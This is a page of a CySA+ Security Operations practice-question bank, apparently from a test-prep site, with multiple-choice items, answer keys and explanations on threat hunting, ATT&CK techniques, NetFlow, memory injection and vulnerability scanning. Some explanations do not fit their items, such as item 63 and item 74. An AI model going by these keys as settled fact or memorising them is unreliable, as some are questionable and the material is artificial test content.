B.Inspect the TLS certificate presented by the remote server
C.Perform a memory dump of the process and look for encryption keys
D.Analyse NetFlow/IPFIX data for unusual data transfer volumes
E.Check the process' command line for suspicious parameters
AnswersA, D, E

Correlation of file access with network connections strengthens exfiltration evidence.

Why this answer

Analysing NetFlow/IPFIX data can reveal volume patterns indicative of exfiltration. Inspecting the TLS certificate or handshake can identify if it's a legitimate service. Checking EDR for file access events can show if sensitive files were read before the connections.

The other options are less direct.

62
MCQmedium

A threat hunter is creating a hypothesis based on recent threat intelligence about a new ransomware variant that uses scheduled tasks for persistence. Which of the following MITRE ATT&CK techniques should the hunter focus on?

A.T1547.001 - Registry Run Keys / Startup Folder
B.T1053.005 - Scheduled Task
C.T1071.001 - Web Protocols
D.T1059.001 - PowerShell
AnswerB

This technique covers persistence via scheduled tasks.

Why this answer

Scheduled tasks are a persistence technique (T1053.005) in the MITRE ATT&CK framework. The hunter should look for unusual scheduled tasks.

63
Multi-Selectmedium

A security analyst is investigating a potential data exfiltration incident. Network traffic analysis shows large outbound data transfers to an external IP address on port 443. The analyst wants to determine if the data was encrypted. Which THREE tools or techniques should the analyst use?

Select 3 answers
A.OSINT tools
B.Wireshark
C.NetFlow/IPFIX
D.tcpdump
E.Vulnerability scanner
AnswersB, C, D

Wireshark can decode packets and show if traffic is encrypted (e.g., TLS).

Why this answer

Wireshark can capture and analyze packets, NetFlow provides flow-level metadata, and examining TLS handshake can determine encryption.

64
MCQhard

An analyst is investigating a potential memory injection attack on a Windows system. Which of the following memory analysis artifacts is most indicative of code injection?

A.A process with a memory region that is both writable and executable (RWX)
B.A process that is running from a temp directory
C.A process that has an unusually high handle count
D.A process with multiple threads in a suspended state
AnswerA

RWX memory regions are often used to host injected shellcode.

Why this answer

A process that is executing in a region of memory that is both writable and executable (RWX) is a strong indicator of injected code, as legitimate processes typically have separate write and execute permissions.

65
MCQmedium

A security team is configuring a vulnerability scanner for external scanning of their public-facing web applications. Which scan type will provide the most accurate assessment of vulnerabilities without requiring credentials?

A.External scan
B.Agent-based scan
C.Authenticated scan
D.Internal scan
AnswerA

Correct. External scans simulate an attacker and do not require credentials.

Why this answer

An external scan assesses the attack surface from the internet perspective, typically without credentials. Agent-based and authenticated scans require credentials or internal access.

66
MCQeasy

A security analyst is reviewing a SIEM alert that triggered on a single failed login attempt from an internal IP address. The username used does not exist in Active Directory. The analyst checks the source IP and finds it belongs to a known vulnerability scanner. What classification should the analyst assign to this alert?

A.False negative
B.True positive
C.True negative
D.False positive
AnswerD

Correct. The alert is triggered by authorized scanning activity, so it is a false positive.

Why this answer

The alert was triggered by a known vulnerability scanner attempting to enumerate usernames. This is expected behavior and not malicious, so it is a false positive.

67
MCQhard

During a threat hunt, an analyst uses osquery to query endpoints for processes that have spawned from Microsoft Word but have network connections. Which of the following TTPs does this technique most likely detect?

A.Pass-the-hash attack
B.Spearphishing attachment leading to macro execution
C.Kerberoasting
D.Data exfiltration over DNS
AnswerB

Macro-enabled documents can spawn suspicious child processes.

Why this answer

Attackers often use macro-enabled documents to execute code, making Word spawn abnormal child processes like PowerShell or cmd.exe, which then connect outbound.

68
MCQmedium

During a threat hunting exercise, a hunter creates a hypothesis that a threat actor is using PowerShell to download payloads from a remote server. Which ATT&CK technique is the hunter most likely investigating?

A.T1047 - Windows Management Instrumentation
B.T1105 - Ingress Tool Transfer
C.T1071.001 - Web Protocols
D.T1059.001 - PowerShell
AnswerB

Ingress Tool Transfer describes the act of downloading tools or payloads from a remote server.

Why this answer

This matches the ATT&CK technique T1059.001 (PowerShell) and T1105 (Ingress Tool Transfer). The hypothesis specifically focuses on downloading payloads, so Ingress Tool Transfer is the primary technique.

69
MCQeasy

During a network traffic analysis, a security analyst notices a high volume of DNS queries to a domain that is algorithmically generated. The domain names follow a random pattern and are not resolved to known IP addresses. Which technique is most likely being used?

A.DNS tunneling
B.Beaconing
C.Domain generation algorithm (DGA)
D.HTTP smuggling
AnswerC

DGAs produce random domain names to communicate with C2 servers.

Why this answer

Domain Generation Algorithms (DGAs) are commonly used by malware to generate a large number of potential C2 domain names to evade static blocklists.

70
MCQhard

During a threat hunt, an analyst queries osquery to find processes where the 'cmdline' contains ' -e ' and the parent process is not 'explorer.exe'. This query is designed to detect which technique?

A.Malicious PowerShell execution
B.Lateral movement via PsExec
C.DLL injection via rundll32
D.Scheduled task creation
AnswerA

The query looks for encoded PowerShell commands (-e) spawned from non-standard parents, a common malicious pattern.

Why this answer

PowerShell with -e (encoded command) is often used for obfuscation; unusual parent processes suggest malicious execution.

71
MCQhard

A security analyst is investigating an alert from an endpoint EDR that shows a process with a parent-child relationship where the parent is Microsoft Word and the child process is wscript.exe executing a command to download a PowerShell script. Which MITRE ATT&CK technique does this likely represent?

A.Phishing (T1566)
B.Lateral Movement (TA0008)
C.Credential dumping (T1003)
D.Persistence (TA0003)
AnswerA

Phishing via malicious document leading to execution of a script.

Why this answer

Phishing often delivers malicious documents. Word spawning wscript.exe to download a script is a classic phishing payload delivery, sub-technique T1566.001.

72
MCQhard

A threat hunter analyzes NetFlow data and observes a host communicating with multiple external IP addresses on high-numbered ports (e.g., 49300-49500) during off-hours. The communications are short-lived and occur in burst patterns. The hunter suspects data exfiltration. Which of the following analysis techniques would best confirm or refute this suspicion?

A.Correlate with authentication logs to see if the user is logged in
B.Check the host's registry for persistence mechanisms
C.Perform a full packet capture on the host's traffic
D.Review DNS logs for domain generation algorithm patterns
AnswerC

Correct. Packet capture reveals the actual data being transmitted.

Why this answer

Full packet capture allows deep inspection of payloads to identify if data is being exfiltrated, as NetFlow only provides metadata.

73
Multi-Selectmedium

A security analyst is configuring a vulnerability scanner for an internal network. Which two settings are most important for reducing false positives during the scan? (Choose two.)

Select 2 answers
A.Disabling unnecessary plug-ins
B.Enabling credentialed scanning
C.Using a higher scan intensity
D.Scanning from multiple IP addresses
E.Scanning only during business hours
AnswersA, B

Disabling irrelevant plug-ins avoids false positives from unrelated checks.

Why this answer

Credentialed scans access system details for accurate results, and appropriate plug-in selection reduces irrelevant checks.

74
MCQhard

During a memory analysis of a compromised host, an analyst finds that 'svchost.exe' is running from 'C:\Users\Public\svchost.exe' instead of 'C:\Windows\System32\svchost.exe'. The process has injected code into a legitimate 'explorer.exe' process. What technique is being observed?

A.WMI persistence
B.DLL injection
C.Process hollowing
D.DLL side-loading
AnswerC

The attacker replaced the legitimate svchost with a malicious one and injected code into explorer.exe.

Why this answer

Running a system binary from a user-writable location is a common masquerading technique, and the code injection into explorer.exe indicates process hollowing or injection.

75
Multi-Selecteasy

A security analyst is performing a vulnerability scan on an internal network. The analyst wants to ensure the scanner can identify vulnerabilities in applications that require authentication. Which TWO scan configurations should be used?

Select 2 answers
A.Scan with default credentials
B.Non-credentialed scan
C.Agent-based scan
D.External scan
E.Credentialed scan
AnswersC, E

Agent-based scans run on endpoints and can perform authenticated checks with local privileges.

Why this answer

Credentialed scans allow the scanner to authenticate to systems and perform deeper checks, while authenticated scans (agent-based) can also provide access.

Page 1 of 3 · 165 questions totalNext →

Ready to test yourself?

Try a timed practice session using only Cysa Security Operations questions.